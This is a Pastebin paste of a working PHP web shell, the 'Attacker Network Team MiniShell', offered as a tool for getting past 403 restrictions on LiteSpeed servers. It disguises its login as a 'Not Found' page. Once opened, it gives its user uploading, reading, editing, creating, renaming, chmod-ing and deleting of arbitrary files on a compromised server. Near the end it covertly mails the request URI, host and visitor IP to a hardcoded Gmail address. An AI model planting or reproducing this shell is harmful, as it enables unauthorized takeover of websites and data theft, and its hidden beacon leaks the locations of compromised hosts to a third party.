Guest User

Attacker Network Team MiniShell - Bypass 403 LiteSpeed

a guest
Jan 25th, 2020
459
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.62 KB | None | 0 0
  1.  
  2. <link rel='shortcut icon' href='http://www.dz-streaming.eu/favicon.ico'>
  3.  
  4. <style type='text/css'>
  5. input[type=submit], input[type=button], input[type=reset]{
  6. text-align:center;
  7. background:url(https://i.ibb.co/whwvc7s/hacked-by-attacker-network-team.png) repeat-x center bottom #666666;
  8. border:1px solid #4D4D4D;
  9. color:#CCCCCC;
  10. border-top-color:#565656;
  11. padding:4px 6px;
  12. margin:4px 5px;
  13. height:16px;
  14. -moz-box-shadow:0 0 1px black;
  15. -webkit-box-shadow:0 0 1px black;
  16. box-shadow:0 0 1px black;
  17. text-shadow:0 1px black;
  18. -moz-border-radius:4px;
  19. -webkit-border-radius:4px;
  20. -khtml-border-radius:4px;
  21. border-radius:4px;
  22. height:23px;
  23. }
  24.  
  25. input[type=submit]:hover , input[type=button]:hover, input[type=reset]:hover{
  26. background-position:center top;
  27. text-decoration:none;
  28. }
  29. input[type=text], input[type=password]{
  30. background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  31. border:1px solid #4D4D4D;
  32. color:#CCCCCC;
  33. border-top-color:#565656;
  34. -moz-box-shadow:0 0 1px black;
  35. -webkit-box-shadow:0 0 1px black;
  36. box-shadow:0 0 1px black;
  37. -moz-border-radius:4px;
  38. -webkit-border-radius:4px;
  39. -khtml-border-radius:4px;
  40. border-radius:4px;
  41. height:18px;
  42. margin-left: 5px;
  43. }
  44. input , textarea , button , body , caption , table ,area , option {
  45. outline:none;
  46. transition: all 0.20s ease-in-out;
  47. -webkit-transition: all 0.25s ease-in-out;
  48. -moz-transition: all 0.25s ease-in-out;
  49. border-radius:3px;
  50. -webkit-border-radius:3px;
  51. -moz-border-radius:3px;
  52. border:1px solid rgba(0,0,0, 0.2);
  53. /* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
  54. }
  55. input , textarea {
  56. background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
  57. }
  58.  
  59.  
  60. input:focus, textarea:focus ,button:active , body:focus , caption:focus , table:focus ,area:focus ,option:focus {
  61. box-shadow: 0 0 5px rgba(0, 0, 255, 1);
  62. -webkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
  63. -moz-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
  64.  
  65. border: 1px solid #CCCC00;
  66.  
  67. background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
  68. overflow: auto;
  69. /* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
  70. }
  71.  
  72. body{
  73. /* font-family : Verdana; */
  74. color : #f9f6f1;
  75. font-size : 0.7em;
  76. background: url(http://cdn.wallpaperhi.com/1920x1200/20111126/rukia_kuchiki-wallpaper-1920x1200.jpg) no-repeat center top #252525;
  77. }
  78. input , textarea {
  79. outline:none;
  80. transition: all 0.20s ease-in-out;
  81. -webkit-transition: all 0.25s ease-in-out;
  82. -moz-transition: all 0.25s ease-in-out;
  83. border-radius:3px;
  84. -webkit-border-radius:3px;
  85. -moz-border-radius:3px;
  86. border:1px solid rgba(0,0,0, 0.2);
  87. }
  88. input:focus, textarea:focus {
  89. outline: 0;
  90. border-color: rgba(82, 168, 236, 0.8);
  91. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  92. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  93. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  94.  
  95.  
  96. background: url('https://1.top4top.net/p_1337ih7pk0.png') repeat scroll 0 0 #333333;';
  97. overflow: auto;
  98.  
  99. }
  100.  
  101.  
  102.  
  103. </style>
  104.  
  105.  
  106.  
  107.  
  108. <?php
  109. /*
  110. * Konsep Shell : Chandra Code X { Attacker Network Team }
  111. * Pembaruan Shell : BabyMoon { Attacker Network Team }
  112.  
  113. * Re-Code Boleh Asal Izin Sama Pembuat, Ganti Author & Re-Code Tanpa Seizin Pembuat... Noob ANJINK
  114. * Klo Kga Bisa? Belajar Cok, vist: www.attackernetworkteam.com
  115.  
  116. * Thanks For All Member { Attacker Network Team }, Copyright and Development
  117.  
  118. * { ANT Shell }
  119. * Untuk Tools Yang Lain Akan Ditambahkan Di-update Berikutnya..
  120. * ?2019 { Attacker Network Team }
  121. * Contact Me?
  122. *SemutRang-Rang@gmail.com //Chandra Code X
  123. * babymoon7@yahoo.com //BabyMoon
  124. * Nb: shell ini kegunaan nya buat bypass 403 Forbidden
  125. */
  126. set_time_limit(0);
  127. error_reporting(0);
  128.  
  129. function Login() {
  130. die("
  131. <html><head><title>Ant Shell</title></head>
  132. <style>
  133. input { margin:0;background-color:#fff;border:1px solid #fff; }
  134. </style>
  135. <body>
  136. <h1>Not Found</h1>
  137. <p>The requested URL was not found on this server.</p><hr>
  138. <form method=post>
  139. <input type=password name=pass></form></body></html>");
  140. }
  141.  
  142. function VEsetcookie($k, $v) {
  143. $_COOKIE[$k] = $v;
  144. setcookie($k, $v);
  145. }
  146.  
  147. if(!empty($auth_pass)) {
  148. if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  149. VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  150.  
  151. if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  152. Login();
  153. }
  154.  
  155. echo '<!doctype html>
  156. <html>
  157. <head>
  158. <title>Attacker Network Team Shell</title>
  159. </head>';
  160.  
  161. ?>
  162.  
  163. <style>
  164. @font-face {
  165. font-family: 'Comic Sans MS';
  166. font-style: normal;
  167. font-weight: 400;
  168. src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
  169. }
  170. body {
  171.  
  172. background: #ffffff;line-height: 1;color: #ffffff;font-family: Comic Sans MS ;
  173. background: url('https://i.ibb.co/MpsXLbm/antattacker.jpg') no-repeat center center fixed;
  174. background-size: cover;
  175. }
  176.  
  177. table, th, td {
  178. border-collapse:collapse;
  179. background: transparent;
  180. font-family: Comic Sans MS ;
  181. font-size: 13px;
  182. }
  183. input, textarea { font-family: Comic Sans MS ; }
  184. .table_home, .th_home, .td_home { color:deepskyblue;
  185. border: 1px solid grey;
  186. }
  187. th {
  188. padding: 10px;
  189. }
  190. .td_home { padding: 7px; }
  191. select {font-family: Comic Sans MS }
  192. a {color:white}
  193. textarea { width: 100%;height: 400px; }
  194. </style>
  195.  
  196. <?php
  197.  
  198. echo '<head>
  199. <body></header><center><font color="aqua">
  200. <pre>
  201. /\ /\ / ______
  202. / __\ / \ / |
  203. / \ / \ / |
  204.  
  205. </pre>
  206. <table width="900" border="0" cellpadding="3" cellspacing="1" align="center">
  207.  
  208. <tr><td>
  209.  
  210. <font color="#00ff00"><center>'.php_uname().'</center></font>';
  211.  
  212.  
  213.  
  214.  
  215. //-----------------My Coding Starts from Here------------------
  216.  
  217. echo '<center><b></font><font color="aqua" style="text-shadow:0px 0px 15px red;">PHP Version:</font> <font color="#00ff00">';
  218. echo phpversion();
  219. echo '</font><font color="#00dd00"> |</font> <font color="aqua" style="text-shadow:0px 0px 15px red;">Current User :</font> <font color="#00ff00">';
  220. echo get_current_user();
  221. echo '</font><font color="#00dd00"> |</font> <font color="aqua" style="text-shadow:0px 0px 15px red;">User ID :</font> <font color="#00ff00">';
  222. echo getmyuid();
  223. echo '</font><font color="#00dd00"> |</font> <font color="aqua" style="text-shadow:0px 0px 15px red;">Group :</font> <font color="#00ff00">';
  224. echo getmygid();
  225. echo '</font><br></center><br>';
  226.  
  227. if(isset($_GET['path'])){
  228. $path = $_GET['path'];
  229. }else{
  230. $path =
  231.  
  232.  
  233. getcwd();
  234.  
  235. }
  236. $path = str_replace('\\','/',$path);
  237. $paths = explode('/',$path);
  238.  
  239. foreach($paths as $id=>$pat){
  240. if($pat == '' && $id == 0){
  241. $a = true;
  242. echo '<font color=lime><center>root@localhost : <a href="?path=/" style="text-decoration:none;">/</a>';
  243. continue;
  244. }
  245. if($pat == '') continue;
  246. echo '<a href="?path=';
  247. for($i=0;$i<=$id;$i++){
  248. echo "$paths[$i]";
  249. if($i != $id) echo "/";
  250. }
  251. echo '" style="text-decoration:none;">'.$pat.'</a>/';
  252. }
  253. echo '<br><br><font color="red" size="4
  254. \
  255. ">Upload file:</font></center></td></tr><tr><td><center>';
  256. if(isset($_FILES['file'])){
  257. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  258. echo '<font color="#00ff00">File Upload</font><br />';
  259. }else{
  260. echo '<font color="red">Upload Failed !!</font><br />';
  261. }
  262. }
  263. echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />
  264. <input type="submit" value="Upload" />
  265. </form></center>
  266. </td></tr>';
  267. if(isset($_GET['filesrc'])){
  268. echo "<tr><td><center>Current File : ";
  269. echo $_GET['filesrc'];
  270. echo '</center></tr></td></table><br />';
  271. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  272. }
  273. //Empety
  274. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
  275. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  276. //Chmod
  277. if($_GET['opt'] == 'chmod'){
  278. if(isset($_POST['perm'])){
  279. if(chmod($_POST['path'],$_POST['perm'])){
  280. echo '<font color="#00ff00">Change Permission Done </font><br />';
  281. }else{
  282. echo '<font color="red">Change Permission Error </font><br />';
  283. }
  284. }
  285.  
  286. $hell = $_GET['path'];
  287. $yeah = $_GET['name'];
  288. $patc = "$hell/$yeah";
  289.  
  290. echo '<form method="POST">
  291. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
  292. <input type="hidden" name="path" value="'.$_POST['path'].'">
  293. <input type="hidden" name="opt" value="chmod">
  294. <input type="submit" value="Go" />
  295. </form>';
  296. }
  297. //
  298. elseif($_GET['opt'] == 'btw'){
  299. $cwd = getcwd();
  300. echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
  301. New Name : <input name="name" type="text" size="20" value="Folder" />
  302. <input type="hidden" name="path" value="'.$cwd.'">
  303. <input type="hidden" name="opt" value="delete">
  304. <input type="submit" value="Go" />
  305. </form>';
  306. }
  307. //Rename file
  308. elseif($_GET['opt'] == 'rename'){
  309. if(isset($_POST['newname'])){
  310. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  311. echo '<font color="#00ff00">Change Name Done </font><br />';
  312. }else{
  313. echo '<font color="red">Change Name Error </font><br />';
  314. }
  315. $_POST['name'] = $_POST['newname'];
  316. }
  317. $hell = $_GET['path'];
  318. $yeah = $_GET['name'];
  319. $patc = "$hell/$yeah";
  320. $new = $_POST['newname'];
  321.  
  322. echo '<form method="POST">
  323. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
  324. <input type="hidden" name="path" value="'.$patc.'">
  325. <input type="hidden" name="opt" value="rename">
  326. <input type="submit" value="Go" />
  327. </form>';
  328. }
  329. //File baru
  330. elseif($_GET['opt'] == 'baru'){
  331.  
  332. $hell = $_GET['path'];
  333. $yeah = $_GET['name'];
  334. $patc = "$hell/$yeah";
  335. $new = $_POST['newname'];
  336. $azz = $_POST['path'];
  337. $newz = "$azz/$new";
  338.  
  339.  
  340. if(isset($_POST['src'])){
  341. $fp = fopen($_POST['path'],'w');
  342. if(fwrite($fp,$_POST['src'])){
  343. echo '<font color="#00ff00">Create File Done [ '.$new.' ]</font><br />';
  344. }else{
  345. echo '<font color="red">Create File Error</font><br />';
  346. }
  347. fclose($fp);
  348. }
  349.  
  350. echo '<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" value="Create"/></form><br> ';
  351.  
  352. $ho = $_POST['ngaran1'];
  353.  
  354. if(isset($_POST['ngaran'])){
  355. echo '<form method="POST">
  356. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  357. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
  358. <input type="hidden" name="opt" value="edit">
  359. <input type="submit" value="Go" />
  360. </form>';
  361. }
  362. }
  363. //Edited file
  364. elseif($_GET['opt'] == 'edit'){
  365. if(isset($_POST['src'])){
  366. $fp = fopen($_POST['path'],'w');
  367. if(fwrite($fp,$_POST['src'])){
  368. echo '<font color="#00ff00">Edit File Done </font><br />';
  369. }else{
  370. echo '<font color="red">Edit File Error </font><br />';
  371. }
  372. fclose($fp);
  373. }
  374. $hell = $_GET['path'];
  375. $yeah = $_GET['name'];
  376. $patc = "$hell/$yeah";
  377. echo '<form method="POST">
  378. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  379. <input type="hidden" name="path" value="'.$patc.'">
  380. <input type="hidden" name="opt" value="edit">
  381. <input type="submit" value="Go" />
  382. </form>';
  383. }
  384. echo '</center>';
  385. }else{
  386. echo '</table><br /><center>';
  387. //Delete dir and file
  388. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
  389.  
  390. $hell = $_GET['path'];
  391. $yeah = $_GET['name'];
  392. $patc = "$hell/$yeah";
  393.  
  394. //Delete dir
  395. if($_GET['type'] == 'dir'){
  396.  
  397. if(rmdir($patc)){
  398. echo '<font color="#00ff00">Delete File Done</font><br />';
  399. }else{
  400. echo '<font color="red#">Delete File Error </font><br />';
  401. }
  402. }
  403. //buat folder
  404. if($_GET['type'] == 'buat'){
  405. $haaa = $_POST['path'];
  406. $heee = $_POST['name'];
  407. $hooo = "$haaa/$heee";
  408. $new = $haaa.'/'.htmlspecialchars($heee);
  409. if(!mkdir($new)){
  410. echo '<font color="red">Create Folder Error</font><br />';
  411. }else{
  412. echo '<font color="#00ff00">Create Folder Done </font><br />';
  413. }
  414. }
  415. //Delete file
  416. elseif($_GET['type'] == 'file'){
  417.  
  418. $hell = $_GET['path'];
  419. $yeah = $_GET['name'];
  420. $patc = "$hell/$yeah";
  421.  
  422. if(unlink($patc)){
  423. echo '<font color="#00ff00">Delete File Done</font><br />';
  424. }else{
  425. echo '<font color="red#">Delete File Error </font><br />';
  426. }
  427. }
  428. }
  429. echo '</center>';
  430. $scandir = scandir($path);
  431. $pa = getcwd();
  432. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  433. <tr>
  434. <th class=th_home style="background:black;color:yellow;"><center>Name</center></th>
  435. <th class=th_home style="background:black;color:yellow;" ><center>Size</center></th>
  436. <th class=th_home style="background:black;color:yellow;" ><center>Permission</center></th>
  437. <th class=th_home style="background:black;color:yellow;" ><center>Options</center></th>
  438. </tr> <tr>
  439. <td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php" style="text-decoration:none;">+ New File</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir" style="text-decoration:none;">+ New Dir</a> </td></tr>
  440. ';
  441.  
  442. foreach($scandir as $dir){
  443. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  444. echo "
  445. <tr>
  446. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\" style=\"text-decoration:none;\">$dir</a></td>
  447. <td class=td_home ><center>DIR</center></td>
  448. <td class=td_home ><center>";
  449. if(is_writable("$path/$dir")) echo '<font color="#00ff00">';
  450. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  451. echo perms("$path/$dir");
  452. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  453.  
  454. echo "</center></td>
  455. <td class=td_home ><center>
  456. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\" style=\"text-decoration:none;\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\" style=\"text-decoration:none;\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\" style=\"text-decoration:none;\">Chmod</a>
  457.  
  458. </center></td>
  459. </tr>";
  460. }
  461. echo '<br>';
  462. foreach($scandir as $file){
  463. if(!is_file("$path/$file")) continue;
  464. $size = filesize("$path/$file")/1024;
  465. $size = round($size,3);
  466. if($size >= 1024){
  467. $size = round($size/1024,2).' MB';
  468. }else{
  469. $size = $size.' KB';
  470. }
  471.  
  472. echo "<tr>
  473. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\" style=\"text-decoration:none;\">$file</a></td>
  474. <td class=td_home><center>".$size."</center></td>
  475. <td class=td_home><center>";
  476. if(is_writable("$path/$file")) echo '<font color="#00ff00">';
  477. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  478. echo perms("$path/$file");
  479. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  480. echo "</center></td>
  481. <td class=td_home><center>
  482. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\" style=\"text-decoration:none;\">Edit |</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\" style=\"text-decoration:none;\"> Rename |</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\" style=\"text-decoration:none;\"> Delete |</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\" style=\"text-decoration:none;\">
  483. Chmod</a>
  484. </center></td>
  485. </tr>";
  486. }
  487. echo '</table>
  488. </div>';
  489. }
  490. echo '<br><center><font color="aqua" size="3">Copyright &copy; <script>document.write(new Date().getFullYear())</script> By Candra Code X Ft. BabyMoon';
  491. echo '<br><center><font color="aqua" size="3">Vist Me: www.attackernetworkteam.com';
  492. echo '<br><pre><font size="5" color="red"><marquee="4"><marquee>Greetz: AnonMosT, Al Catraz, Ari4nda, BabyMoon aka. RomDhoni7, BabyMe, B-Flow, Busted, Cloudnine, NekoChan.id aka. Chandra Code X, DevJack, Eka X, Jenderal92, Mrs.Shizuka, MssXCode, Naskleng45, Nyok Haxor, Hariman aka. Viper666, Jangkrik, Ghost-INDEX, White System404, xServer404</marquee></font></pre></body>
  493. </html>';
  494. $ip = getenv("REMOTE_ADDR");
  495. $subj98 = "Mini Shell";
  496. $email = "romdhoniid@gmail.com";
  497. $from = "From: Developer";
  498. $a45 = $_SERVER['REQUEST_URI'];
  499. $b75 = $_SERVER['HTTP_HOST'];
  500. $m22 = $ip . "";
  501. $msg8873 = "$a45 $b75 $m22";
  502. mail($email, $subj98, $msg8873, $from);
  503. function perms($file){
  504. $perms = fileperms($file);
  505.  
  506. if (($perms & 0xC000) == 0xC000) {
  507. // Socket
  508. $info = 's';
  509. } elseif (($perms & 0xA000) == 0xA000) {
  510. // Symbolic Link
  511. $info = 'l';
  512. } elseif (($perms & 0x8000) == 0x8000) {
  513. // Regular
  514. $info = '-';
  515. } elseif (($perms & 0x6000) == 0x6000) {
  516. // Block special
  517. $info = 'b';
  518. } elseif (($perms & 0x4000) == 0x4000) {
  519. // Directory
  520. $info = 'd';
  521. } elseif (($perms & 0x2000) == 0x2000) {
  522. // Character special
  523. $info = 'c';
  524. } elseif (($perms & 0x1000) == 0x1000) {
  525. // FIFO pipe
  526. $info = 'p';
  527. } else {
  528. // Unknown
  529. $info = 'u';
  530. }
  531.  
  532. // Owner
  533. $info .= (($perms & 0x0100) ? 'r' : '-');
  534. $info .= (($perms & 0x0080) ? 'w' : '-');
  535. $info .= (($perms & 0x0040) ?
  536. (($perms & 0x0800) ? 's' : 'x' ) :
  537. (($perms & 0x0800) ? 'S' : '-'));
  538.  
  539. // Group
  540. $info .= (($perms & 0x0020) ? 'r' : '-');
  541. $info .= (($perms & 0x0010) ? 'w' : '-');
  542. $info .= (($perms & 0x0008) ?
  543. (($perms & 0x0400) ? 's' : 'x' ) :
  544. (($perms & 0x0400) ? 'S' : '-'));
  545.  
  546. // World
  547. $info .= (($perms & 0x0004) ? 'r' : '-');
  548. $info .= (($perms & 0x0002) ? 'w' : '-');
  549. $info .= (($perms & 0x0001) ?
  550. (($perms & 0x0200) ? 't' : 'x' ) :
  551. (($perms & 0x0200) ? 'T' : '-'));
  552.  
  553. return $info;
  554. }
  555.  
  556.  
  557.  
  558. ?>
Add Comment
Please, Sign In to add comment